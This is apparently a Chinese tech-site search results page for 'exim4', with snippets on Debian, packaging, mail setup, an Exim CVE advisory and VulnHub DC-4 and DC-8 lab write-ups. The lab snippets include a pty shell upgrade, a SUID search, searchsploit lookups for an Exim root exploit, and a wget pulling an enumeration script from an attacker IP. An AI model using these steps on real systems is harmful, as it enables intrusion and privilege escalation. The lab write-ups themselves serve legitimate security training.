首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏搬砖笔记

    debian更改源和卸载无用服务

    删除 exim4 服务 exim4服务 开放 port :25 大家都知道这个端口做啥都吧! systemctl stop exim4 systemctl disable exim4 apt-get purge --auto-remove exim4 exim4-base exim4-config exim4-daemon-light rm -rf /var/log/exim4/ 删除 rpcbind 服务 rpcbind 服务 此服务开启port :111 这个端口。

    4.2K140编辑于 2021-12-10
  • 来自专栏vulnhub DC 1-9

    VulnHub DC-8 靶机渗透测试笔记

    靶机渗透测试笔记靶机信息靶机名称:DC-8靶机来源:VulnHub目标:获取 root 权限,找到最终 flag难度:⭐⭐⭐⭐☆(中等偏难)涉及技术:信息收集、SQL注入、hashcat 哈希破解、PHP 反弹 Shell、Exim4 pty;pty.spawn("/bin/bash")'用户目录什么都没有,去找提权方向:五、提权5.1 SUID 文件查找find / -perm -u=s -type f 2>/dev/null发现 exim4 ,查看版本:exim4 --versionai给出5.2 搜索 Exim4 漏洞searchsploit exim 4查看脚本路径并复制到当前目录:searchsploit -p 46996#查看searchsploit hashcat 破解 → john/turtle ↓登录后台 → 发现 PHP 富文本 → 写入反弹 Shell ↓nc 接收 shell → www-data ↓SUID 发现 exim4

    15310编辑于 2026-03-08
  • 来自专栏Seebug漏洞平台

    Exim CVE-2020-28018 漏洞分析

    COPY *.deb /root/exim4/ COPY *.ddeb /root/exim4/ RUN dpkg -i /root/exim4/*.deb || apt --fix-broken install -y RUN dpkg -i /root/exim4/*.deb && dpkg -i /root/exim4/*.ddeb RUN sed -i "s/127.0.0.1 ; :: 1/0.0.0.0/g" /etc/exim4/update-exim4.conf.conf RUN sed -i "1i\MAIN_TLS_ENABLE = yes" /etc/exim4/exim4 .conf.template COPY exim.crt /etc/exim4/exim.crt COPY exim.key /etc/exim4/exim.key COPY exim_start /exim_start /bin/sh -e if [ -n "$EX4DEBUG" ]; then echo "now debugging $0 $@" set -x fi DIR=/etc/exim4 CERT

    1.2K40发布于 2021-06-17
  • 来自专栏Netkiller

    怎样制作RPM包

    donations.html /home/neo/workspace/public_html/mail/evolution.html /home/neo/workspace/public_html/mail/exim4 php.mail.html preface.download.html preface.html qq.html reader.html smtp.error.html sohu.html tom.html exim4 / exim4/faq.html exim4/index.html postfix/ postfix/configure.html postfix/index.html postfix/rspamd.html share/doc/netkiller/donations.html /usr/share/doc/netkiller/evolution.html /usr/share/doc/netkiller/exim4 /usr/share/doc/netkiller/exim4/faq.html /usr/share/doc/netkiller/exim4/index.html /usr/share/doc/netkiller

    5.3K60发布于 2018-03-05
  • 来自专栏vulnhub DC 1-9

    VulnHub DC-4 靶机渗透测试笔记

    2>/dev/null最后有一个 sh,得注意一下:/home/jim/test.sh5.4 查看 /etc/passwd 12 cat /etc/passwd找到点信息,exim4 7.2 查看邮件看一下之前打不开的 mbox:去邮箱里找,之前找到过 exim4 服务:Debian-exim:x:108:112::/var/spool/exim4:/bin/false/var/spool /exim4 无权限进不去:计划任务也没权限看:mail 里面有个 www-data 没权限看,只能看 jim:在邮件里找到密码:Password is: ^xHhA&hvim0y7.3 切换到 charlessu

    10100编辑于 2026-03-06
  • 来自专栏/root

    vulnhub靶机实战_DC-8

    usr/bin/chfn /usr/bin/gpasswd /usr/bin/chsh /usr/bin/passwd /usr/bin/sudo /usr/bin/newgrp /usr/sbin/exim4 dbus-1.0/dbus-daemon-launch-helper /bin/ping /bin/su /bin/umount /bin/mount www-data@dc-8:/etc$ 九、提权 exim4 使用find命令查找具有suid权限的命令,找到一个exim4命令,exim是一款在Unix系统上使用的邮件服务,exim4在使用时具有root权限 # 版本查询 # 命令: www-data @dc-8:/etc$ cd /usr/sbin cd /usr/sbin www-data@dc-8:/usr/sbin$ exim4 --version # 结果: exim4 --version pipe smtp Fixed never_users: 0 Configure owner: 0:0 Size of off_t: 8 Configuration file is /var/lib/exim4

    39610编辑于 2025-09-28
  • 记录一次vulnhub靶场——DC8的渗透测试过程

    找到一个exim4的程序,于是查看exim4的具体版本号,则为exim4.89,返回kali中搜索对应的提权程序 接着进入改目录并使用Python搭建一个简单的web服务,然后下载至靶机当中进行提权。

    31010编辑于 2025-10-23
  • 来自专栏网络安全自修室

    每周打靶 | Vulnhub-DC8靶机渗透实战

    写一个python交互 :python -c 'import pty;pty.spawn("/bin/bash")' 提权 使用find命令查找具有suid权限的命令,找到一个exim4命令,exim 是一款在Unix系统上使用的邮件服务,exim4在使用时具有root权限 使用searchsploit命令搜索exim相关漏洞 然后把46996.sh拷贝到本地并改名为666.sh,并在kali开启

    60730编辑于 2023-09-02
  • 来自专栏FreeBuf

    Linux通过第三方应用提权实战总结

    exim4提权 Exim4是在剑桥大学开发的另一种消息传输代理(MTA),用于在连接到Internet的Unix系统上使用。 sudo -l用之前的密码试了不对,发现exim4; 查看exim4当前版本号 /usr/sbin/exim4 —version ? 或者 dpkg -l | grep exim 查看包安装情况 ?

    1.8K20发布于 2021-02-08
  • 来自专栏FreeBuf

    WordPress 4.6远程代码执行漏洞(CVE-2016-10033)复现环境搭建指南

    注意这里会要求你输入后台管理员的邮箱,这个是和后面poc中的一部分挂钩的,后面会提到 靶机安装exim4而不是sendmail sudo apt-get install exim4 上述命令用来安装exim4 里面写的是是建立连接的命令 命令执行第一次 curl攻击机获取rce.txt 写到/tmp目录下 命令执行第二次 运行tmp目录下的rce nc连接靶机 效果不错,但是局限性较多,比如不能用虚拟机 还有要安装exim4

    2.7K70发布于 2018-02-24
  • 来自专栏靶机复现

    vulnhub DC-8

    4444端口,在contact us随便输入点提交 图片.png 成功反弹shell 图片.png 切换到交互式shell 图片.png 尝试suid提权,搜索具有suid权限的文件 图片.png 有一个exim4

    25020编辑于 2022-05-10
  • 来自专栏爱游博客

    WordPress SMTP发送邮件设置

    ssl证书,用的是Let’s Encrypt免费ssl证书设置好了才发现不能发送邮件,这点事我不能接受的,以前用的国外的VPS一直没有问题,搬至腾讯云就不能用mail()函数发邮件,刚开始一直以为是我的Exim4

    3.7K10发布于 2019-08-07
  • 来自专栏C3ting

    Vulnhnb刷题-DC-4

    root用户: 寻找 flag文件 攻下: 方法3: 查询我们的本地shell有什么权限: find / -user root -perm -4000 -print 2>/dev/null 发现常见的exim4 ,看看可以使用这个漏洞不,先查看一下版本信息:exim4 --version 搜索看看有啥可用的漏洞信息:searchsploit exim 4 发现只有满足版本要求,传上去看看。

    32810编辑于 2023-12-26
  • 一份适合个人的服务器安全指南

    系统日志分析和报告ss - 查看服务器正在监听的端口Lynis - Linux安全审计OSSEC - 主机入侵检测危险区域杂项使用Google的MSMTP(简单的Sendmail)使用隐式TLS将Gmail和Exim4

    38410编辑于 2024-09-21
  • 来自专栏Debian中国

    Debian 环境下安装配置 Gitlab

    您也可以用 exim4 或者配置外部的SMTP服务,使用SMTP发送邮件。

    2.2K40发布于 2018-12-20
  • 来自专栏红队蓝军

    vulnhub靶场之DC-8靶场实战(超详细)

    是给某个用户或者组授予执行某些命令的权限,权限在人身上 SUID是给命令赋予root用户的权限,权限在命令上 find / -perm -u=s -type f 2>/dev/null 查看exim的版本 exim4

    1.1K10编辑于 2024-08-14
  • 来自专栏闪石星曜CyberSecurity

    靶机闯关 DC-8

    /bash')" wget http://192.168.111.128:8888/LinEnum.sh kali:python -m SimpleHTTPServer 8888 赋予权限后执行,发现exim4

    77810发布于 2020-07-27
  • 来自专栏渗透靶机

    Vulnhub靶机:DC-8

    通过这个exim4提权。脚本应该是扫出来了。我没看到而已。 exim 4.89找一下漏洞利用脚本。 这个脚本看着就行,版本比较符合。拿下来传到靶机里。 看一下脚本怎么用。

    30010编辑于 2025-01-15
  • 来自专栏绿盟科技安全情报

    【漏洞预警】Exim远程代码执行漏洞(CVE-2019-15846)预警通告

    4漏洞防护 4.1 官方升级 目前Exim官方已在4.92.2版本中修复了该漏洞,请受影响的用户尽快升级版本进行防护,官方下载链接: https://ftp.exim.org/pub/exim/exim4

    1.6K10发布于 2019-10-24
  • 来自专栏devops_k8s

    Sentry错误日志监控

    9.6 673ba4512dda 2 weeks ago 200MB tianon/exim4

    2.3K31发布于 2021-06-23
领券